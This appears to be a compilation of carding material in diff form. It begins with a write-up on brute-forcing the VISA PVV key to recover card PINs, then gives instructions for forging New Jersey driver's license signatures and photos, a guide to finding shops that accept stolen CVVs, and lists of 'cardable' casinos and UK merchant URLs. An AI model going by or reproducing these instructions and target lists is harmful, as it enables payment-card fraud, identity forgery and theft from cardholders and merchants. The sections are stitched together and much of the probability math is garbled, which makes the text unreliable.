+immediately know the associated PIN. Therefore this document studies that possibility, analyzing the
+algorithm and proposing a method for the attack. Finally we give a tool which implements the attack and
+present results about the estimated chance to break the system. Note that as long as other banking security
+related algorithms (other PIN formats such as IBM PIN or card validation signatures such as CVV or
+CVC) are similar to VISA PIN, the same analysis can be done yielding nearly the same results and
+conclusions.
+VISA PVV algorithm
+One of the most common PIN algorithms is the VISA PIN Verification Value (PVV). The customer is
+given a PIN and a magnetic stripe card. Encoded in the magnetic stripe is a four digit number, called
+PVV. This number is a cryptographic signature of the PIN and other data related to the card. When a user
+enters his/her PIN the ATM reads the magnetic stripe, encrypts and sends all this information to a central
+computer. There a trial PVV is computed using the customer entered PIN and the card information with a
+cryptographic algorithm. The trial PVV is compared with the PVV stored in the card, if they match the
+central computer returns to the ATM authorization for the transaction. See in more detail.
+The description of the PVV algorithm can be found in two documents linked in the previous page. In
+summary it consists in the encryption of a 8 byte (64 bit) string of data, called Transformed Security
+Parameter (TSP), with DES algorithm (DEA) in Electronic Code Book mode (ECB) using a secret 64 bit
+key. The PVV is derived from the output of the encryption process, which is a 8 byte string. The four
+digits of the PVV (from left to right) correspond to the first four decimal digits (from left to right) of the
+output from DES when considered as a 16 hexadecimal character (16 x 4 bit = 64 bit) string. If there are
+no four decimal digits among the 16 hexadecimal characters then the PVV is completed taken (from left
+to right) non decimal characters and decimalizing them by using the conversion A->0, B->1, C->2, D->3,
+E->4, F->5. Here is an example:
+Output from DES: 0FAB9CDEFFE7DCBA
+PVV: 0975
+The strategy of avoiding decimalization by skipping characters until four decimal digits are found (which
+happens to be nearly all the times as we will see below) is very clever because it avoids an important bias
+in the distribution of digits which has been proven to be fatal for other systems, although the impact on
+this system would be much lower. See also a related problem not applying to VISA PVV.
+The TSP, seen as a 16 hexadecimal character (64 bit) string, is formed (from left to right) with the 11
+rightmost digits of the PAN (card number) excluding the last digit (check digit), one digit from 1 to 6
+which selects the secret encrypting key and finally the four digits of the PIN. Here is an example:
+PAN: 1234 5678 9012 3445
+Key selector: 1
+PIN: 2468
+TSP: 5678901234412468
+
+Obviously the problem of breaking VISA PIN consists in finding the secret encrypting key for DES. The
+method for that is to do a brute force search of the key space. Note that this is not the only method, one
+could try to find a weakness in DEA, many tried, but this old standard is still in wide use (now been
+replaced by AES and RSA, though). This demonstrates it is robust enough so that brute force is the only
+viable method (there are some better attacks but not practical in our case, for a summary see LASEC
+memo and for the dirty details see Biham & Shamir 1990, Biham & Shamir 1991, Matsui 1993, Biham &
+Biryukov 1994 and Heys 2001).
+The key selector digit was very likely introduced to cover the possibility of a key compromise. In that
+case they just have to issue new cards using another key selector. Older cards can be substituted with new
+ones or simply the ATM can transparently write a new PVV (corresponding to the new key and keeping
+the same PIN) next time the customer uses his/her card. For the shake of security all users should be
+asked to change their PINs, however it would be embarrassing for the bank to explain the reason, so very
+likely they would not make such request.
+Preparing the attack
+A brute force attack consists in encrypting a TSP with known PVV using all possible encrypting keys and
+compare each obtained PVV with the known PVV. When a match is found we have a candidate key. But
+how many keys we have to try? As we said above the key is 64 bit long, this would mean we have to try
+2^64 keys. However this is not true. Actually only 56 bits are effective in DES keys because one bit (the
+least significant) out of each octet was historically reserved as a checksum for the others; in practice those
+8 bits (one for each of the 8 octets) are ignored.
+Therefore the DES key space consists of 2^56 keys. If we try all these keys will we find one and only one
+match, corresponding to the bank secret key? Certainly not. We will obtain many matching keys. This is
+because the PVV is only a small part (one fourth) of the DES output. Furthermore the PVV is
+degenerated because some of the digits (those between 0 and 5 after the last, seen from left to right, digit
+between 6 and 9) may come from a decimal digit or from a decimalized hexadecimal digit of the DES
+output. Thus many keys will produce a DES output which yields to the same matching PVV.
+Then what can we do to find the real key among those other false positive keys? Simply we have to
+encrypt a second different TSP, also with known PVV, but using only the candidate keys which gave a
+positive matching with the first TSP-PVV pair. However there is no guarantee we won't get again many
+false positives along with the true key. If so, we will need a third TSP-PVV pair, repeat the process and
+so on.
+Before we start our attack we have to know how many TSP-PVV pairs we will need. For that we have to
+calculate the probability for a random DES output to yield a matching PVV just by chance. There are
+several ways to calculate this number and here I will use a simple approach easy to understand but which
+requires some background in mathematics of probability.
+A probability can always be seen as the ratio of favorable cases to possible cases. In our problem the
+number of possible cases is given by the permutation of 16 elements (the 0 to F hexadecimal digits) in a
+group of 16 of them (the 16 hexadecimal digits of the DES output). This is given by 16^16 ~ 1.8 * 10^19
+which of course coincides with 2^64 (different numbers of 64 bits). This set of numbers can be separated
+into five categories:
+1. Those with at least four decimal digits (0 to 9) among the 16 hexadecimal digits (0 to F) of the DES
+output.
+2. Those with exactly only three decimal digits.
+3. Those with exactly only two decimal digits.
+4. Those with exactly only one decimal digit.
+5. Those with no decimal digits (all between A and F).
+Let's calculate how many numbers fall in each category. If we label the 16 hexadecimal digits of the DES
+
+output as X1 to X16 then we can label the first four decimal digits of any given number of the first
+category as Xi, Xj, Xk and Xl. The number of different combinations with this profile is given by the
+product 6 i-1 * 10 * 6j-i-1 * 10 * 6k-j-1 * 10 * 6 l-k-1 * 10 * 1616-l where the 6's come from the number
+of possibilities for an A to F digit, the 10's come from the possibilities for a 0 to 9 digit, and the 16 comes
+from the possibilities for a 0 to F digit. Now the total numbers in the first category is simply given by the
+summation of this product over i, j, k, l from 1 to 16 but with i < j < k < l. If you do some math work you
+will see this equals to the product of 104/6 with the summation over i from 4 to 16 of (i-1) * (i-2) * (i-3) *
+6i-4 * 16 16-i ~ 1.8 * 1019.
+Analogously the number of cases in the second category is given by the summation over i, j, k from 1 to
+16 with i < j < k of the product 6i-1 * 10 * 6j-i-1 * 10 * 6k-j-1 * 10 * 616-k which you can work it out to
+be 16!/(3! * (16-13)!) * 103 * 6 13 = 16 * 15 * 14/(3 * 2) * 103 * 613 = 56 * 104 * 613 ~ 7.3 * 1015.
+Similarly for the third category we have the summation over i, j from 1 to 16 with i < j of 6 i-1 * 10 * 6j-
+i-1 * 10 * 616-j which equals to 16!/(2! * (16-14)!) * 102 * 614 = 2 * 103 * 615 ~ 9.4 * 1014. Again, for
+the fourth category we have the summation over i from 1 to 16 of 6i-1 * 10 * 616-i = 160 * 615 ~ 7.5 *
+1013. And finally the amount of cases in the fifth category is given by the permutation of six elements (A
+to F digits) in a group of 16, that is, 616 ~ 2.8 * 1012.
+I hope you followed the calculations up to this point, the hard part is done. Now as a proof that everything
+is right you can sum the number of cases in the 5 categories and see it equals the total number of possible
+cases we calculated before. Do the operations using 64 bit numbers or rounding (for floats) or overflow
+(for integers) errors won't let you get the exact result.
+Up to now we have calculated the number of possible cases in each of the five categories, but we are
+interested in obtaining the number of favorable cases instead. It is very easy to derive the latter from the
+former as this is just fixing the combination of the four decimal digits (or the required hexadecimal digits
+if there are no four decimal digits) of the PVV instead of letting them free. In practice this means turning
+the 10's in the formula above into 1's and the required amount of 6's into 1's if there are no four decimal
+digits. That is, we have to divide the first result by 104, the second one by 103 * 6, the third one by 102 *
+62 , the fourth one by 10 * 63 and the fifth one by 64 . Then the number of favorable cases in the five
+categories are approximately 1.8 * 1015, 1.2 * 1012, 2.6 * 1011 , 3.5 * 1010, 2.2 * 109 respectively.
+Now we are able to obtain what is the probability for a DES output to match a PVV by chance. We just
+have to add the five numbers of favorable cases and divide it by the total number of possible cases. Doing
+this we obtain that the probability is very approximately 0.0001 or one out of ten thousand. Is it strange
+this well rounded result? Not at all, just have a look at the numbers we calculated above. The first
+category dominates by several orders of magnitude the number of favorable and possible cases. This is
+rather intuitive as it seems clear that it is very unlikely not having four decimal digits (10 chances out of
+16 per digit) among 16 hexadecimal digits. We saw previously that the relationship between the number
+of possible and favorable cases in the first category was a division by 10^4, that's where our result p =
+0.0001 comes from.
+Our aim for all these calculations was to find out how many TSP-PVV pairs we need to carry a successful
+brute force attack. Now we are able to calculate the expected number of false positives in a first search: it
+will be the number of trials times the probability for a single random false positive, i.e. t * p where t =
+2^56, the size of the key space. This amounts to approximately 7.2 * 10^12, a rather big number. The
+expected number of false positives in the second search (restricted to the positive keys found in the first
+search) will be (t * p) * p, for a third search will be ((t * p) * p) * p and so on. Thus for n searches the
+expected number of false positives will be t * p^n.
+We can obtain the number of searches required to expect just one false positive by expressing the
+equation t * p^n = 1 and solving for n. So n equals to the logarithm in base p of 1/t, which by properties
+of logarithms it yields n = log(1/t)/log(p) ~ 4.2. Since we cannot do a fractional search it is convenient to
+round up this number. Therefore what is the expected number of false positives if we perform five
+searches? It is t * p^5 ~ 0.0007 or approximately 1 out of 1400. Thus using five TSP-PVV pairs is safe to
+obtain the true secret key with no false positives.
+
+The attack
+Once we know we need five TSP-PVV pairs, how do we get them? Of course we need at least one card
+with known PIN, and due to the nature of the PVV algorithm, that's the only thing we need. With other
+PIN systems, such as IBM, we would need five cards, however this is not necessary with VISA PVV
+algorithm. We just have to read the magnetic stripe and then change the PIN four times but reading the
+card after each change.
+It is necessary to read the magnetic stripe of the card to get the PVV and the encrypting key selector. You
+can buy a commercial magnetic stripe reader or make one yourself following the instructions you can find
+in the previous page and links therein. Once you have a reader see this description of standard magnetic
+tracks to find out how to get the PVV from the data read. In that document the PVV field in tracks 1 and 2
+is said to be five character long, but actually the true PVV consists of the last four digits. The first of the
+five digits is the key selector. I have only seen cards with a value of 1 in this digit, which is consistent
+with the standard and with the secret key never being compromised (and therefore they did not need to
+move to another key changing the selector).
+I did a simple C program, getpvvkey.c, to perform the attack. It consists of a loop to try all possible keys
+to encrypt the first TSP, if the derived PVV matches the true PVV a new TSP is tried, and so on until
+there is a mismatch, in which case the key is discarded and a new one is tried, or the five derived PVVs
+match the corresponding true PVVs, in which case we can assume we got the bank secret key, however
+the loop goes on until it exhausts the key space. This is done to assure we find the true key because there
+is a chance (although very low) the first key found is a false positive.
+It is expected the program would take a very long time to finish and to minimize the risks of a power cut,
+computer hang out, etc. it does checkpoints into the file getpvvkey.dat from time to time (the exact time
+depends on the speed of the computer, it's around one hour for the fastest computers now in use). For the
+same reason if a positive key is found it is written on the file getpvvkey.key. The program only displays
+one message at the beginning, the starting position taken from the checkpoint file if any, after that nothing
+more is displayed.
+The DES algorithm is a key point in the program, it is therefore very important to optimize its speed. I
+tested several implementations: libdes, SSLeay, openssl, cryptlib, nss, libgcrypt, catacomb, libtomcrypt,
+cryptopp, ufc-crypt. The DES functions of the first four are based on the same code by Eric Young and is
+the one which performed best (includes optimized C and x86 assembler code). Thus I chose libdes which
+was the original implementation and condensed all relevant code in the files encrypt.c (C version) and
+x86encrypt.s (x86 assembler version). The code is slightly modified to achieve some enhancements in a
+brute force attack: the initial permutation is a fixed common steep in each TSP encryption and therefore
+can be made just one time at the beginning. Another improvement is that I wrote a completely new setkey
+function (I called it nextkey) which is optimum for a brute force loop.
+To get the program working you just have to type in the corresponding place five TSPs and their PVVs
+and then compile it. I have tested it only in UNIX platforms, using the makefile Makegetpvvkey to
+compile (use the command "make -f Makegetpvvkey"). It may compile on other systems but you may
+need to fix some things. Be sure that the definition of the type long64 corresponds to a 64 bit integer. In
+principle there is no dependence on the endianness of the processor. I have successfully compiled and run
+it on Pentium-Linux, Alpha-Tru64, Mips-Irix and Sparc-Solaris. If you do not have and do not want to
+install Linux (you don't know what you are missing ;-) you still have the choice to run Linux on CD and
+use my program, see my page running Linux without installing it.
+Once you have found the secret bank key if you want to find the PIN of an arbitrary card you just have to
+write a similar program (sorry I have not written it, I'm too lazy that would try all 10^4 PINs by
+generating the corresponding TSP, encrypting it with the (no longer) secret key, deriving the PVV and
+comparing it with the PVV in the magnetic stripe of the card. You will get one match for the true PIN.
+Only one match? Remember what we saw above, we have a chance of 0.0001 that a random encryption
+matches the PVV. We are trying 10000 PINs (and therefore TSPs) thus we expect 10000 * 0.0001 = 1
+
+false positive on average.
+This is a very interesting result, it means that, on average, each card has two valid PINs: the customer PIN
+and the expected false positive. I call it "false" but note that as long as it generates the true PVV it is a
+PIN as valid as the customer's one. Furthermore, there is no way to know which is which, even for the
+ATM; only customer knows. Even if the false positive were not valid as PIN, you still have three trials at
+the ATM anyway, enough on average. Therefore the probability we calculated at the beginning of this
+document about random guessing of the PIN has to be corrected. Actually it is twice that value, i.e., it is
+0.0006 or one out of more than 1600, still safely low.
+Results
+It is important to optimize the compilation of the program and to run it in the fastest possible processor
+due to the long expected run time. I found that the compiler optimization flag -O gets the better
+performance, thought some improvement is achieved adding the -fomit-frame-pointer flag on Pentium-
+Linux, the -spike flag on Alpha-Tru64, the -IPA flag on Mips-Irix and the -fast flag on Sparc-Solaris.
+Special flags (-DDES_PTR -DDES_RISC1 -DDES_RISC2 -DDES_UNROLL -DASM) for the DES
+code have generally benefits as well. All these flags have already been tested and I chose the best
+combination for each processor (see makefile) but you can try to fine tune other flags.
+According to my tests the best performance is achieved with the AMD Athlon 1600 MHz processor,
+exceeding 3.4 million keys per second. Interestingly it gets better results than Intel Pentium IV 1800 MHz
+and 2000 MHz (see figures below, click on them to enlarge). I believe this is due to some I/O saturation,
+surely cache or memory access, that the AMD processor (which has half the cache of the Pentium) or the
+motherboard in which it is running, manages to avoid. In the first figure below you can see that the DES
+breaking speed of all processors has more or less a linear relationship with the processor speed, except for
+the two Intel Pentium I mentioned before. This is logical, it means that for a double processor speed you'll
+get double breaking speed, but watch out for saturation effects, in this case it is better the AMD Athlon
+1600 MHz, which will be even cheaper than the Intel Pentium 1800 MHz or 2000 MHz.
+In the second figure we can see in more detail what we would call intrinsic DES break power of the
+processor. I get this value simply dividing the break speed by the processor speed, that is, we get the
+number of DES keys tried per second and per MHz. This is a measure of the performance of the processor
+type independently of its speed. The results show that the best processor for this task is the AMD Athlon,
+then comes the Alpha and very close after it is the Intel Pentium (except for the higher speed ones which
+perform very poor due to the saturation effect). Next is the Mips processor and in the last place is the
+Sparc. Some Alpha and Mips processors are located at bottom of scale because they are early releases not
+including enhancements of late versions. Note that I included the performance of x86 processors for C
+and assembler code as there is a big difference. It seems that gcc is not a good generator of optimized
+machine code, but of course we don't know whether a manual optimization of assembler code for the
+other processors (Alpha, Mips, Sparc) would boost their results compared to the native C compilers (I did
+not use gcc for these other platforms) as it happens with the x86 processor.
+The top mark I got running my program was approximately 3 423 922 keys/second using the AMD
+processor. So, how much time would need the AMD to break the VISA PIN? It would simply be the ratio
+between the size of the key space and the key trying rate, that is, 2^56 keys/3 423 922 keys/second ~ 2.1 *
+10^10 seconds ~ 244 thousand days ~ 667 years. This is the time for the program to finish, but on average
+the true secret key will be found by half that time. Using commercial cryptographic cards (like the IBM
+PCI Cryptographic Coprocessor or the XL-Crypt Encryption Accelerator) does not help very much, they
+are, at most, 2 times faster than my top mark, i.e. it would take more than a hundred years to find the key,
+at best. Some more speed might be achieved (double, at most) by using a dedicated gigabit VPN box or
+similar hardware in a way surely not foreseen by the manufacturer ;-)
+Even if you manage to get a hundred newest AMD or Pentium processors working in parallel it would
+still take more than 3 years to find the key (if they are provided with crypto-cards the time might be
+reduced to less than two years or to less than one year in case of a hundred gigabit VPN boxes). It is clear
+
+that only expensive dedicated hardware (affordable only by big institutions) or a massive Internet
+cooperative attack would success in a reasonable time (both things were already made). These are the
+good news. The bad news is that I have deliberately lied a little bit (you may already noticed it): VISA
+PVV algorithm allows for the use of triple DES (3-DES) encryption using a 128 bit (only 112 effective)
+encrypting key. If 3-DES is indeed in use by the PVV system you can still use the same attack but you
+would need four additional TSP-PVV pairs (no problem with that) and it would take more than 3 * 2^56
+times more to find the double length key. Forget it.
+PVV algorithm with triple DES consists in the encryption of the TSP with the left half of the encrypting
+key, then it decrypts the result with the right half of the key and encrypts the result again with the left half
+of the key. Note that if you use a symmetric 128 bit key, that is, the left half equals the right half, you get
+a single DES encryption with a single 64 bit key. In this case the algorithm degenerates into the one I
+explained above. That's why I did this work, because PVV system is old and maybe when it was
+implanted 3-DES was not viable (due to hardware limitations) or it seemed excessive (by that time) to the
+people responsible of the implementation, so that it might be possible some banks are using the PVV
+algorithm with single DES encryption.
+Finally we can conclude that the VISA PVV algorithm as in its general form using 3-DES is rather
+secure. It may only be broken using specially designed hardware (implying an enormous inversion and
+thus not worth, see Wayner and Wiener) which would exceed the encryption rate of the newest processors
+by many orders of magnitude. However the apparently endless exponential growing of the computer
+capacities as well as that of the Internet community makes to think that PVV system might be in real
+danger within a few years. Of course those banks using PVV with single DES (if any) are already under
+true risk of an Internet cooperative attack. You might believe that is something very hard to coordinate, I
+mean convincing people, but think about trojan and virus programs and you will see it is not so difficult
+to carry on.
+Capturing Signatures for ID's
+Photo-laminated Ids are done with a specialty Polaroid camera. As this is an older technology, these
+cameras turn up quite often on Ebay. The means by which these cameras capture your signature is as
+follows:
+You sign a piece a paper, and that paper gets put into a slot in the camera. On that paper is all your info,
+license number, name, address, everything that is eventually going to be put on the license. Its all bigger
+than its going to be on you license too. Id guess the font is about 12 pt type on the paper you sign (it
+eventually winds up about 9pt on the license)
+So when the agent snaps your pic, they are actually taking your pic and a pic of the card with all your info
+on it at the same time. That results in a polaroid pic of your id, which is cut with a die cutter and
+laminated. So your signature is actually photographed.
+Heres how I get the signature on the ID.
+1. Have them sign any piece of white paper.
+2. Scan it. I scan at 600dpi, my template is 1200dpi
+3. Crop as tight as you can to the actually signature.
+4. Convert to greyscale. (remove color information)
+5. Convert back to CMYK.
+6. Adjust Levels. Make the white totally white with the highlight eyedropper. Use the shadow and
+
+midtone adjusters to get the signature a little darker (it probably lightened up with ur first adjustment)
+7. Copy and paste into your template.
+8. Change blending mode for the signature layer to Multiply. This makes all the white area transparent.
+9. Line up over sig line and transform to the right size. The tops of the signature letters just about touch
+the bottom line of user info. Keep in mind that the person signs on that signature line with all the info
+present on the paper, so sometimes the signature will overlap the info, depends how big they sign. Youre
+instructed at DMV not to touch the letters and most people manage to stay in the area theyre supposed to.
+Even if you dont, they still go ahead, they dont make you sign a new piece of paper.
+Thats about it. I usually wind up stretching the sig a little longer too, it should take up at least half the sig
+line.
+So the signature isnt digital, none of the license is, its a photograph of your actual signature.
+Heres the hex of the color I use for the words: 52474F Even though they are black on the white paper,
+photographing them changes the colors and they are never dead black on the dl. Blur all the type layers
+(except the camera number over ur photo) too with a guassian blur filter. I blur about 2.0 pixels on a
+1200dpi temp. Blur the sig to match, usually a little more than the type, like twice. Nothing printed on the
+ID is crisp, except for the 3 digit camera number on top of your pic.
+The hardest thing I have with NJ is getting the picture to look like a polaroid pic. Taking the pic with a
+digital camera creates way too much detail so I always scanned in a passport pic. Still couldnt get it
+perfect though. You have to remove all perception of depth, thru blurring, contrast and however else you
+can think of. The only way Ive gotten an ID to look exactly like a real one is by scanning in the pic off
+someones real ID. My friend got ahold of an old DMV camera, so I dont have to make them on my comp
+too much anymore.
+Oh another thing, the back of a NJ is actually printed right on the lamination, printing on a piece of paper
+never looks right. I have some real laminations so I never had to worry about that. Dont use bright white
+paper for the back either. Xerox makes colored paper, use the grey, its perfect and you can buy it at office
+max (or office depot, I get em confused)
+Cardable Online casinos list Gambling links
+10bet.com
+24hbet.com
+5dimes.com
+admiralbet.com
+allstar.com
+alpenland-online.at
+bcsports.net
+bet-at-home.com
+bet24.com
+bet2day.com
+bet365.com
+bet.betclass.co.uk
+commissioncircle.com
+betdirect.com
+betfairpromo.com
+betfred.com
+
+betinternet.com
+betoddoreven.com
+betroyal.com
+bets4all.com
+betsafe.com
+betsense.com
+dgm2.com
+betsson.com
+betway.com
+betzone.com
+bluesq.com
+newbodog.com
+boylesports.com
+betandwin.com
+commissionking.com
+qksrv.net
+cashpoint.at
+centrebet.com
+betthe.net
+direcbet.com
+easybets.com
+eurobet.com
+eurotip-online.com
+expekt.com
+fonbet.com
+gamebookers.com
+globet.com
+goldbet.com
+gwbet.com
+indosoccer.com
+intertops.com
+interwetten.com
+jazzsports.com
+ladbrokes.com
+lionbet.com
+paysports.com
+multibet.com
+nordicbet.com
+pacificsportclub.com
+paddypower.com
+parbet.com
+pinnaclesports.com
+playit.com
+pointbet.com
+premierbet.com
+betroyal.com
+sportonlinebookie.com
+scandicbookmakers.com
+wetten-schwechat.at
+seangraham.com
+skybet.com
+snaisport.com
+sportfanatik.com
+sportingbet.com
+sportingodds.co.uk
+sportingoptions.co.uk
+
+sbobet.com
+sports.com
+sportsbetting.com
+qksrv.net
+sportwetten-online.de
+stanjames.com
+stanleybet.com
+swapbets.com
+thebet.cc
+thegreek.com
+totalbet.com
+totesport.com
+unibet.com
+unitedbet.com
+victorchandler.com
+vierklee.com
+vikingbet.com
+vikingbet.com
+wettpunkt.com
+willhill.com
+winunited.com
+worldbet.com
+worldwager.com
+wsex.com
+Cardable shops finding
+Good day everybody!
+I’d like to talk a little about cardable online-shops finding. It would be useful for some beginners. So for
+getting list of shops go to _ww.amazon.com and of course to everybodie’s favorite google.com. When
+you’ve got it – choose what you need.
+Once you’ve chosen you need to check it. Usually they take some CVV’s and try to order on holder’s
+address something in $300-$400 (for example PDA, MP3 player or another shiet like this). Also to avoid
+too much attention choose not very fast delivery, something not expencive for 3-4 days delay. And wait.
+If later you’ll got track – congratulations, you’ve found cardable shop. But it’s early to dance. There
+would be a lot of problems later. For example shop can require call or scans on the order with amount
+more $800-$1000 due to bad proxy, database of black addresses or enroll of cheap bank (First for
+example )).
+So that’s about all for beginners. Further improve and try new ways – that’s only base actions.
+
+CARDABLE SITES - HITLIST (90% of these shops ship)
+http://www.casevalue.com/cgi-
+bin/CaseValue.storefront/4ae961fd00107608273fc0a8018c064c/Catalog/1087 amxaccepted
+http://www.arenaflowers.com/gifts/champagne_de_venoge_brut_rose amx accepted
+http://www.virginwines.com/product/prod_detail.jsp?PRODUCT%3C%3Eprd_id=845524442977627
+http://www.champagneuk.com/catalog/?gclid=CLaIw5eB4p0CFVVu4wodgHflNA
+http://cheers-wine-merchants.co.uk/Laurent-Perrier-Rose-Champagne-Rose-Wine-353.asp sec amx
+accepted
+http://www.thedrinkshop.com/products/nlpdetail.php?prodid=653&afwinid=90909
+http://www.bancroftwines.com/detailed.aspx?pID=10853&gclid=CNvHrNWC4p0CFQdl4wodL1CWNw
+http://www.fromvineyardsdirect.com/wine/laurent_perrier.php?
+gclid=CPWljuqC4p0CFUYA4wodz1VdMg
+http://www.frw.co.uk/searchWines.aspx?
+keywords=Laurent+Perrier+Rose&sid=4&FRS=GAd&gclid=CLbxjfWC4p0CFVtn4woduha8NA
+http://www.laithwaites.co.uk/browsearticles.aspx?
+Filter=WineType:browse_types,white&results_per_page=&cid=search|google|specific|
+c2&mrc=pl48&gclid=CKHBlIyD4p0CFcts4wod6lW9OQ amxacceptd
+https://www.giftsinternational.net/search_results.asp?
+query=Laurent+Perrier&imageField.x=9&imageField.y=10&gclid=CNi1hqWD4p0CFUtp4wodgSYdNw
+http://www.nakedwines.com/
+http://www.averys.com/default.aspx?mrc=E347&imi=winesdirectvoucher
+http://www.formulawine.co.uk/wine/fresita
+http://www.eburywinecellars.co.uk/products-page/champagne/page/2/
+http://www.majestic.co.uk/find/category-is-Champagne%20and%20Sparkling%20Wine/category-is-
+Champagne/Special%20Offer-is-Special%20Offer?cmp=aw&cmp=aw
+http://www.sparklingdirect.co.uk/pink_champagne.asp
+http://www.bibendum-wine.co.uk/retail/wine-details/JLPNVROB6D/Laurent%20Perrier%20Rose
+%20NV%2075cl
+http://www.bbr.com/product-16286B-laurent-perrier-rose
+http://www.hotwines.co.uk/catalog/product_info.php?products_id=39
+http://www.scottcountry.co.uk/products_detail.asp?productID=2447&froogle=true
+http://www.winedancer.com/contents/en-uk/d263.html
+http://www.woodenwinebox.co.uk/index.php?mod=category&id_ctg=6
+http://www.flowergram.co.uk/icat/champagnecasesgiftpacks amxaccepted
+http://www.anybooze.com/moet--chandon-brut-imperial-champagne-341-p.asp
+http://www.thewhiskyexchange.com/Search-hennessy.aspx
+http://www.parkerswhisky.co.uk/luxury-gift-hampers-c-45.html?
+osCsid=641beec7e176472ff1f931ebfd45a7ac amxaccepted ptx
+http://shop.oliverscornwall.com/hennessy-paradis-extra-cognac-brandy-special-price-5-p.asp
+http://www.chateauonline.co.uk/F-1012-alcool/P-15971-hennessy-paradis_1085319
+http://www.retail-world.net/store/comersus_message.asp?message=Cannot+get+product+details
+%2E+Please+contact+us+to+request+more+information+about+item v and mc amx accepted
+http://www.nextdaychampagne.co.uk/shopscr70.html
+http://www.buyagift.co.uk/Product/Id/3268/Name/Gift_Bottle_of__Dom_Perignon_Vintage_2000_Cham
+pagne
+http://www.allgifts.ie/Dom-Perignon-Vintage-Champagne-Gift-!26726-version.html irish
+http://www.pauladamsfinewines.co.uk/champagnes-967-0.html?
+gclid=COShiYKN4p0CFU0A4wodPTL4Mw
+http://www.wineandco.co.uk/chateau-lafite-rothschild-5517-m-uk-liv-uk.html
+http://www.millesima.co.uk/F-1002-wine/K-119-Area~Bordeaux/K-115-Producers~Chateau-Lafite-
+Rothschild?gclid=CJulj8-O4p0CFZQA4wodfjkkNw
+http://www.evinite.com/bordeaux/pauillac/chateau-lafite-rothschild
+http://www.antique-wine.com/lafite.php
+
+http://www.flower-delivery-uk.co.uk/champagne-gift.htm
+http://www.toastchampagne.co.uk/shop/champagne/moet-et-chandon/ amx accepted
+http://www.champagneexpress.co.uk/products.asp?pid=38
+http://www.oddbins.com/products/productDetail.asp?productcode=19062 amx acptd
+http://www.cgarsltd.co.uk/1992-moet-chandon-champagne-cuvee-perignon-p-5984.html amx acceptd
+http://www.robersonwinemerchant.co.uk/shop/gift-ideas/one-bottle-of-dom-perignon-gift-boxed
+http://www.serenatawines.com/?s_kwcid=vintage%20wine|2819508707 amx acptd
+http://www.jeroboams.co.uk/webapp/wcs/stores/servlet/catalog_10001_10001_-1
+http://www.magnum.co.uk/
+http://www.winedirect.co.uk/product_info.php?products_id=4628&from_id=8304
+http://www.cadmanfinewines.co.uk/ amx acptd
+http://www.bennettsfinewines.com/store/
+http://www.nicholasrobertsltd.com/
+http://www.jaglass.co.uk/index.php?
+main_page=index&cPath=36&zenid=1311e25b61fc6bfde4a1e5a01dd952c2
+http://www.laywheeler.com/?gclid=CNi8j9eZ4p0CFZoU4wod3i1TNQ
+http://www.barrelsandbottles.co.uk/
+http://www.surf4wine.co.uk/
+http://www.winediscoveries.co.uk/ sec amx?
+http://www.thesussexwinecompany.co.uk/shop/ amc acpt
+http://www.viniferaboutique.com/store/index.php?route=product/category&path=38
+http://www.giftinspiration.com/acatalog/Wine_gifts.html
+http://www.giftingdirect.co.uk/
+http://www.wineware.co.uk/ amx acpt
+http://www.classicwinedirect.com/product-sub-category.aspx?
+country=0&colour=2&grape=0&range=0&gclid=COanyfad4p0CFU0B4wod_yRZMw v and mc amx
+http://www.satchellswines.com/ ppal amx
+http://www.winestore.co.uk/shop/fine_wines.htm
+http://www.thesecretcellar.co.uk/?gclid=CPDw8M2e4p0CFZoU4wod3i1TNQ
+http://www.butlerswines.co.uk/?gclid=CLT3zOeg4p0CFVBd4wod32k4Mg ppal amx acptd
+http://www.bestvintage.co.uk/
+http://winedown.co.uk/wine/louis-roederer-brut-premier-non-vintage-champagne.htm
+http://www.nickollsandperks.co.uk/filter.asp?
+pagenumber=1&pagesize=50&country=0009®ion=0020&grower=0744&gclid=CNGkkayi4p0CFVB
+d4wod32k4Mg
+http://www.thegoodwineshop.co.uk/Sparkling-Wine/Product-7421.aspx
+http://shop.purewines.org/1999-cristal-champagne-jeroboam-3ltr-louis-roederer-743-p.asp
+http://www.davy.co.uk/p/wineshop-buy-online/champagne-and-sparkling-wine/champagne-
+selection/louis-roederer-brut-premier-nv-champagne.html
+http://cellarandkitchen.adnams.co.uk/?utm_source=AW&utm_medium=cpa amx acptd
+http://www.goedhuis.com/products/champagne/champagne/nv-louis-roederer-rich-2.html
+http://www.gasconline.com/categories.php?Cat=2&SubCatID=228
+http://www.citychampagnes.com/louis-roederer.aspx amx axpt
+http://www.fortnumandmason.com/(S(olioe255y4k4gtz2hikmef55))/catalog/productinfo.aspx?
+id=7543&AspxAutoDetectCookieSupport=1
+http://www.corkr.com/winedetail.php?id=269
+http://www.sundaytimeswineclub.co.uk/DWBase/jsp/templates/article/productDetails.jsp?CID=MAIL|
+55081&productId=prod26225 amx acpt
+http://www.jacquel.be/Champagnes-Millesimes.php?pg=6&gclid=CPTxsJmo4p0CFUYA4wodz1VdMg
+inter
+soundslive
+absolutemusic
+guitar.co.uk merchant city music
+reidys
+dolphinmusic
+guitarampkeyboard
+
+dv247
+gear4music v and mc
+umbrellamusic v and mc
+ukguitars
+playrecord.net
+musicshopdirect
+guitarandampshop
+musicstree
+ollysguitar
+visionguitars
+steelcityguitars
+fortissimoinstruments
+themusicking
+http://www.guitarvillage.co.uk/product-list.asp?manuid=119&catid=3
+http://www.nevadamusic.co.uk/Musical_Instrument_Accessories/Accessories/sc1218/p739.aspx
+http://www.absolutemusic.co.uk/shop/view_product.php?
+product=gbslpstebch1&gclid=CKH_vdaC9ZkCFQVfFQodcgqMRg
+http://www.guitarampkeyboard.com/basket.php
+http://www.gear4music.com/Electric_Guitars/Epiphone_Electric.html?
+gclid=CJuatvCC9ZkCFQVfFQodcgqMRg
+http://www.maxguitarstore.com/store/index.php?productID=3812 inter
+http://www.dangleberrymusic.co.uk/Richwood_Guitars_Greenburst_Les_Paul_Guitar_Limited_Edition_
+Tre-pr-5247.html
+http://www.realtimemusic.co.uk/gibson-gary-moore-bfg.html
+http://www.mansons.co.uk/ v and mc sec
+http://www.musicstreet.co.uk/accessories-cases-bags-c-27_84.html?
+gclid=CPe_x4uE9ZkCFQMFZgodcEYFQg
+http://www.hartnollguitars.co.uk/products.asp?id=3978
+http://www.soundslive.co.uk/product.asp?id=2346 v and mc sec
+http://www.projectmusic.net/american-standard-stratocaster-3-color-sunburst-latest-version-2600-p.asp
+http://www.soundpad.co.uk/
+http://www.chappellofbondstreet.co.uk/C~5034~Fender+Electric+Guitars
